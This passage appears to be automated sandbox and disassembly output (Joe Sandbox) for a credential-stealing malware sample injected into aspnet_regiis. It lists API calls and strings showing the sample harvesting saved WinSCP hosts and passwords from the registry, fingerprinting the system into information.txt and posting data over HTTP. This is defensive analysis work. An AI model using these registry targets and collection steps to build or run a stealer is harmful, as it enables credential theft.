                                                                                                                                                                              • _memset.LIBCMT ref: 02A0E1B7
                                                                                                                                                                              • _memset.LIBCMT ref: 02A0E1D7
                                                                                                                                                                              • _memset.LIBCMT ref: 02A0E1E8
                                                                                                                                                                              • _memset.LIBCMT ref: 02A0E1F9
                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02A0E22D
                                                                                                                                                                              • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 02A0E25E
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02A0E276
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02A0E29D
                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02A0E2BD
                                                                                                                                                                              • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 02A0E2E0
                                                                                                                                                                              • RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,Host: ,Soft: WinSCP,02A368E7), ref: 02A0E379
                                                                                                                                                                              • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?), ref: 02A0E3D9
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _memset$Value$CloseOpen$Enum
                                                                                                                                                                              • String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A10519: lstrcpy.KERNEL32(00000000,?), ref: 02A10538
                                                                                                                                                                                • Part of subcall function 02A04AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04AE8
                                                                                                                                                                                • Part of subcall function 02A04AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04AEE
                                                                                                                                                                                • Part of subcall function 02A04AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04AF4
                                                                                                                                                                                • Part of subcall function 02A04AB6: lstrlen.KERNEL32(000000FF,00000000,?), ref: 02A04B06
                                                                                                                                                                                • Part of subcall function 02A04AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 02A04B0E
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                              • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 02A05FD8
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?), ref: 02A05FF6
                                                                                                                                                                              • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02A0618E
                                                                                                                                                                              • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 02A061D2
                                                                                                                                                                              • lstrlen.KERNEL32(?,",mode,02A378D8,------,02A378CC,b74ef0d8ce56e494b0d83e1d5be9dbeb,",build_id,02A378B4,------,02A378A8,",02A3789C,------), ref: 02A065FD
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A0660C
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02A06617
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A0661E
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A0662B
                                                                                                                                                                              • _memmove.LIBCMT ref: 02A06639
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A06647
                                                                                                                                                                              • lstrlen.KERNEL32(?,?,00000000), ref: 02A06655
                                                                                                                                                                              • _memmove.LIBCMT ref: 02A06662
                                                                                                                                                                              • lstrlen.KERNEL32(?,?,00000000), ref: 02A06677
                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,?,00000000), ref: 02A06685
                                                                                                                                                                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 02A066E2
                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 02A066ED
                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 02A066F9
                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 02A06705
                                                                                                                                                                              • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 02A06200
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocateConnectCrackFileOptionProcessReadSend
                                                                                                                                                                              • String ID: "$"$"$------$------$------$------$b74ef0d8ce56e494b0d83e1d5be9dbeb$build_id$mode
                                                                                                                                                                              • API String ID: 3306106941-443600106
                                                                                                                                                                              • Opcode ID: a13aef782eae1466db8740d6364cf700b0e51f380b9bee78111d0be8795f8cd1
                                                                                                                                                                              • Instruction ID: d38feb94fc1820e86f26fad5c6967b016ca5af736833ff8b87385b2cfe50267b
                                                                                                                                                                              • Opcode Fuzzy Hash: a13aef782eae1466db8740d6364cf700b0e51f380b9bee78111d0be8795f8cd1
                                                                                                                                                                              • Instruction Fuzzy Hash: 3F228531D802799ADF21EB60DE45BDDB776AF04310F4185E2A919B3150DE70AFDA8FA0

                                                                                                                                                                              Control-flow Graph (nodes 912-929, first block 2a18643-2a18653; legend: Executed / Not Executed)
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 02A18684
                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 02A1869B
                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 02A186B2
                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 02A186C9
                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 02A186E0
                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 02A186F7
                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 02A1870E
                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 02A18725
                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 02A1873C
                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 02A18753
                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 02A1876A
                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 02A18781
                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 02A18798
                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 02A187AF
                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 02A187C6
                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 02A187DD
                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 02A187F4
                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 02A1880B
                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 02A18822
                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 02A18839
                                                                                                                                                                              • LoadLibraryA.KERNEL32(?,02A184C2), ref: 02A1884A
                                                                                                                                                                              • LoadLibraryA.KERNEL32(?,02A184C2), ref: 02A1885B
                                                                                                                                                                              • LoadLibraryA.KERNEL32(?,02A184C2), ref: 02A1886C
                                                                                                                                                                              • LoadLibraryA.KERNEL32(?,02A184C2), ref: 02A1887D
                                                                                                                                                                              • LoadLibraryA.KERNEL32(?,02A184C2), ref: 02A1888E
                                                                                                                                                                              • GetProcAddress.KERNEL32(76DA0000,02A184C2), ref: 02A188AA
                                                                                                                                                                              • GetProcAddress.KERNEL32(75840000,02A184C2), ref: 02A188C5
                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 02A188DC
                                                                                                                                                                              • GetProcAddress.KERNEL32(753A0000,02A184C2), ref: 02A188F7
                                                                                                                                                                              • GetProcAddress.KERNEL32(77300000,02A184C2), ref: 02A18912
                                                                                                                                                                              • GetProcAddress.KERNEL32(774D0000,02A184C2), ref: 02A1892D
                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 02A18944
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressProc$LibraryLoad
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2238633743-0
                                                                                                                                                                              • Opcode ID: 9e566fb7b1f91ca51c97a365d5a7de9be937287ae0fbe2ca1cad5765d097c648
                                                                                                                                                                              • Instruction ID: 6b3cb6d02573d0a662d37dafd51d92dbf50a097ff396d2d04acf6b628e636e89
                                                                                                                                                                              • Opcode Fuzzy Hash: 9e566fb7b1f91ca51c97a365d5a7de9be937287ae0fbe2ca1cad5765d097c648
                                                                                                                                                                              • Instruction Fuzzy Hash: 24711C75C90332AFDB025FA1F948B243BA2F71C6513508F66E915A2220E732C6F4EF55

                                                                                                                                                                              Control-flow Graph (node 930, block 2a13b86-2a145a5; legend: Executed / Not Executed)
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                                • Part of subcall function 02A10CC0: GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,02A365B6,?,?,?), ref: 02A10CD8
                                                                                                                                                                                • Part of subcall function 02A10CC0: RtlAllocateHeap.NTDLL(00000000), ref: 02A10CDF
                                                                                                                                                                                • Part of subcall function 02A10CC0: GetLocalTime.KERNEL32(?), ref: 02A10CEB
                                                                                                                                                                                • Part of subcall function 02A10CC0: wsprintfA.USER32 ref: 02A10D16
                                                                                                                                                                                • Part of subcall function 02A115D4: _memset.LIBCMT ref: 02A11607
                                                                                                                                                                                • Part of subcall function 02A115D4: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 02A11626
                                                                                                                                                                                • Part of subcall function 02A115D4: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 02A1164B
                                                                                                                                                                                • Part of subcall function 02A115D4: RegCloseKey.ADVAPI32(?,?,?,?), ref: 02A11657
                                                                                                                                                                                • Part of subcall function 02A115D4: CharToOemA.USER32(?,?), ref: 02A1166B
                                                                                                                                                                                • Part of subcall function 02A11684: GetCurrentHwProfileA.ADVAPI32(?), ref: 02A1169F
                                                                                                                                                                                • Part of subcall function 02A11684: _memset.LIBCMT ref: 02A116CE
                                                                                                                                                                                • Part of subcall function 02A11684: lstrcat.KERNEL32(?,00000000), ref: 02A116F6
                                                                                                                                                                                • Part of subcall function 02A11684: lstrcat.KERNEL32(?,02A36ECC), ref: 02A11713
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                                • Part of subcall function 02A109A2: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 02A109D5
                                                                                                                                                                                • Part of subcall function 02A109A2: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 02A10A15
                                                                                                                                                                                • Part of subcall function 02A109A2: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 02A10A6A
                                                                                                                                                                                • Part of subcall function 02A109A2: RtlAllocateHeap.NTDLL(00000000), ref: 02A10A71
                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(Path: ,02A3687C,HWID: ,02A36870,GUID: ,02A36864,00000000,MachineID: ,02A36854,00000000,Date: ,02A36848,02A36844,02A379AC,Version: ,02A365B6), ref: 02A13DDB
                                                                                                                                                                                • Part of subcall function 02A1224A: OpenProcess.KERNEL32(00000410,00000000,02A13DEA,00000000,?), ref: 02A1226C
                                                                                                                                                                                • Part of subcall function 02A1224A: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 02A12287
                                                                                                                                                                                • Part of subcall function 02A1224A: CloseHandle.KERNEL32(00000000), ref: 02A1228E
                                                                                                                                                                                • Part of subcall function 02A10B30: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,02A13E95,Windows: ,02A368A0), ref: 02A10B44
                                                                                                                                                                                • Part of subcall function 02A10B30: RtlAllocateHeap.NTDLL(00000000), ref: 02A10B4B
                                                                                                                                                                                • Part of subcall function 02A11807: __EH_prolog3_catch_GS.LIBCMT ref: 02A1180E
                                                                                                                                                                                • Part of subcall function 02A11807: CoInitializeEx.COMBASE(00000000,00000000), ref: 02A1181F
                                                                                                                                                                                • Part of subcall function 02A11807: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 02A11830
                                                                                                                                                                                • Part of subcall function 02A11807: CoCreateInstance.COMBASE(02A32F00,00000000,00000001,02A32E30,?), ref: 02A1184A
                                                                                                                                                                                • Part of subcall function 02A11807: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 02A11880
                                                                                                                                                                                • Part of subcall function 02A11807: VariantInit.OLEAUT32(?), ref: 02A118DB
                                                                                                                                                                                • Part of subcall function 02A11997: __EH_prolog3_catch.LIBCMT ref: 02A1199E
                                                                                                                                                                                • Part of subcall function 02A11997: CoInitializeEx.COMBASE(00000000,00000000), ref: 02A119AD
                                                                                                                                                                                • Part of subcall function 02A11997: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 02A119BE
                                                                                                                                                                                • Part of subcall function 02A11997: CoCreateInstance.COMBASE(02A32F00,00000000,00000001,02A32E30,?), ref: 02A119D8
                                                                                                                                                                                • Part of subcall function 02A11997: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 02A11A0E
                                                                                                                                                                                • Part of subcall function 02A11997: VariantInit.OLEAUT32(?), ref: 02A11A5D
                                                                                                                                                                                • Part of subcall function 02A10C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,02A01385), ref: 02A10C91
                                                                                                                                                                                • Part of subcall function 02A10C85: RtlAllocateHeap.NTDLL(00000000), ref: 02A10C98
                                                                                                                                                                                • Part of subcall function 02A10C85: GetComputerNameA.KERNEL32(00000000,02A01385), ref: 02A10CAC
                                                                                                                                                                                • Part of subcall function 02A10C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,02A013B9), ref: 02A10C5F
                                                                                                                                                                                • Part of subcall function 02A10C53: RtlAllocateHeap.NTDLL(00000000), ref: 02A10C66
                                                                                                                                                                                • Part of subcall function 02A10C53: GetUserNameA.ADVAPI32(00000000,02A013B9), ref: 02A10C7A
                                                                                                                                                                                • Part of subcall function 02A11563: CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 02A11575
                                                                                                                                                                                • Part of subcall function 02A11563: GetDeviceCaps.GDI32(00000000,00000008), ref: 02A11580
                                                                                                                                                                                • Part of subcall function 02A11563: GetDeviceCaps.GDI32(00000000,0000000A), ref: 02A1158B
                                                                                                                                                                                • Part of subcall function 02A11563: ReleaseDC.USER32(00000000,00000000), ref: 02A11596
                                                                                                                                                                                • Part of subcall function 02A11563: GetProcessHeap.KERNEL32(00000000,00000104,?,?,02A14098,?,Display Resolution: ,02A368F4,00000000,User Name: ,02A368E4,00000000,Computer Name: ,02A368D0,AV: ,02A368C4), ref: 02A115A2
                                                                                                                                                                                • Part of subcall function 02A11563: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 02A115A9
                                                                                                                                                                                • Part of subcall function 02A11563: wsprintfA.USER32 ref: 02A115BB
                                                                                                                                                                                • Part of subcall function 02A10DDB: GetKeyboardLayoutList.USER32(00000000,00000000,02A3670D,?,?), ref: 02A10E0C
                                                                                                                                                                                • Part of subcall function 02A10DDB: LocalAlloc.KERNEL32(00000040,00000000), ref: 02A10E1A
                                                                                                                                                                                • Part of subcall function 02A10DDB: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 02A10E28
                                                                                                                                                                                • Part of subcall function 02A10DDB: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 02A10E57
                                                                                                                                                                                • Part of subcall function 02A10DDB: LocalFree.KERNEL32(00000000), ref: 02A10EFF
                                                                                                                                                                                • Part of subcall function 02A10D2E: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 02A10D49
                                                                                                                                                                                • Part of subcall function 02A10D2E: RtlAllocateHeap.NTDLL(00000000), ref: 02A10D50
                                                                                                                                                                                • Part of subcall function 02A10D2E: GetTimeZoneInformation.KERNEL32(?), ref: 02A10D5F
                                                                                                                                                                                • Part of subcall function 02A10D2E: wsprintfA.USER32 ref: 02A10D7D
                                                                                                                                                                                • Part of subcall function 02A10F51: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,02A14252,Processor: ,[Hardware],02A36950,00000000,TimeZone: ,02A36940,00000000,Local Time: ,02A3692C), ref: 02A10F65
                                                                                                                                                                                • Part of subcall function 02A10F51: RtlAllocateHeap.NTDLL(00000000), ref: 02A10F6C
                                                                                                                                                                                • Part of subcall function 02A10F51: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,02A36888,?,?,?,02A14252,Processor: ,[Hardware],02A36950,00000000,TimeZone: ,02A36940,00000000,Local Time: ), ref: 02A10F8A
                                                                                                                                                                                • Part of subcall function 02A10F51: RegQueryValueExA.KERNEL32(02A36888,00000000,00000000,00000000,000000FF,?,?,?,02A14252,Processor: ,[Hardware],02A36950,00000000,TimeZone: ,02A36940,00000000), ref: 02A10FA6
                                                                                                                                                                                • Part of subcall function 02A10F51: RegCloseKey.ADVAPI32(02A36888,?,?,?,02A14252,Processor: ,[Hardware],02A36950,00000000,TimeZone: ,02A36940,00000000,Local Time: ,02A3692C,Keyboard Languages: ,02A36910), ref: 02A10FAF
                                                                                                                                                                                • Part of subcall function 02A11007: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 02A1107D
                                                                                                                                                                                • Part of subcall function 02A11007: wsprintfA.USER32 ref: 02A110DB
                                                                                                                                                                                • Part of subcall function 02A10FBA: GetSystemInfo.KERNEL32(?), ref: 02A10FD4
                                                                                                                                                                                • Part of subcall function 02A10FBA: wsprintfA.USER32 ref: 02A10FEC
                                                                                                                                                                                • Part of subcall function 02A11119: GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,02A36910,Display Resolution: ,02A368F4,00000000,User Name: ,02A368E4,00000000,Computer Name: ,02A368D0,AV: ,02A368C4,Install Date: ), ref: 02A11131
                                                                                                                                                                                • Part of subcall function 02A11119: RtlAllocateHeap.NTDLL(00000000), ref: 02A11138
                                                                                                                                                                                • Part of subcall function 02A11119: GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 02A11154
                                                                                                                                                                                • Part of subcall function 02A11119: wsprintfA.USER32 ref: 02A1117A
                                                                                                                                                                                • Part of subcall function 02A11192: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 02A111E9
                                                                                                                                                                                • Part of subcall function 02A114A5: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,02A36712,?,?), ref: 02A114D4
                                                                                                                                                                                • Part of subcall function 02A114A5: Process32First.KERNEL32(00000000,00000128), ref: 02A114E4
                                                                                                                                                                                • Part of subcall function 02A114A5: Process32Next.KERNEL32(00000000,00000128), ref: 02A11542
                                                                                                                                                                                • Part of subcall function 02A114A5: CloseHandle.KERNEL32(00000000), ref: 02A1154D
                                                                                                                                                                                • Part of subcall function 02A11203: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,02A3670F,00000000,?,?), ref: 02A11273
                                                                                                                                                                                • Part of subcall function 02A11203: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 02A112B0
                                                                                                                                                                                • Part of subcall function 02A11203: wsprintfA.USER32 ref: 02A112DD
                                                                                                                                                                                • Part of subcall function 02A11203: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 02A112FC
                                                                                                                                                                                • Part of subcall function 02A11203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 02A11332
                                                                                                                                                                                • Part of subcall function 02A11203: lstrlen.KERNEL32(?), ref: 02A11347
                                                                                                                                                                                • Part of subcall function 02A11203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,02A36E8C), ref: 02A113DC
                                                                                                                                                                                • Part of subcall function 02A11203: RegCloseKey.ADVAPI32(?), ref: 02A11446
                                                                                                                                                                                • Part of subcall function 02A11203: RegCloseKey.ADVAPI32(?), ref: 02A11472
                                                                                                                                                                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,Keyboard Languages: ,02A36910,Display Resolution: ,02A368F4,00000000,User Name: ,02A368E4,00000000), ref: 02A14563
                                                                                                                                                                                • Part of subcall function 02A16E97: CreateThread.KERNEL32(00000000,00000000,02A16DC6,?,00000000,00000000), ref: 02A16F36
                                                                                                                                                                                • Part of subcall function 02A16E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 02A16F3E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Heap$Process$Allocate$wsprintf$Close$CreateOpen$InitializeQueryValuelstrcatlstrcpy$InformationLocalNamelstrlen$BlanketCapsCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariant_memset$AllocCharComputerDevicesDirectoryDisplayFileFirstFreeGlobalH_prolog3_catchH_prolog3_catch_LocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZone
                                                                                                                                                                              • String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt

                                                                                                                                                                              Control-flow Graph

[Control-flow graph of the function starting at 2a0884c; legend: executed / not executed. Graph image not reproduced.]
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A10795: StrCmpCA.SHLWAPI(?,?,?,02A08863,?,?,?), ref: 02A1079E
                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 02A08941
                                                                                                                                                                                • Part of subcall function 02A10519: lstrcpy.KERNEL32(00000000,?), ref: 02A10538
                                                                                                                                                                                • Part of subcall function 02A122B0: _memset.LIBCMT ref: 02A122D7
                                                                                                                                                                                • Part of subcall function 02A122B0: OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 02A1237D
                                                                                                                                                                                • Part of subcall function 02A122B0: TerminateProcess.KERNEL32(00000000,00000000), ref: 02A1238B
                                                                                                                                                                                • Part of subcall function 02A122B0: CloseHandle.KERNEL32(00000000), ref: 02A12392
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 02A08AA6
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A08AAD
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,ERROR_RUN_EXTRACTOR), ref: 02A08B95
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A371E8), ref: 02A08BAB
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A371EC), ref: 02A08BD3
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A08CF0
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A08D0B
                                                                                                                                                                                • Part of subcall function 02A16E97: CreateThread.KERNEL32(00000000,00000000,02A16DC6,?,00000000,00000000), ref: 02A16F36
                                                                                                                                                                                • Part of subcall function 02A16E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 02A16F3E
                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02A08D4E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcpy$Processlstrlen$FileHeaplstrcat$AllocateCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait_memset
                                                                                                                                                                              • String ID: ERROR_RUN_EXTRACTOR
                                                                                                                                                                              • API String ID: 2819533921-2709115261
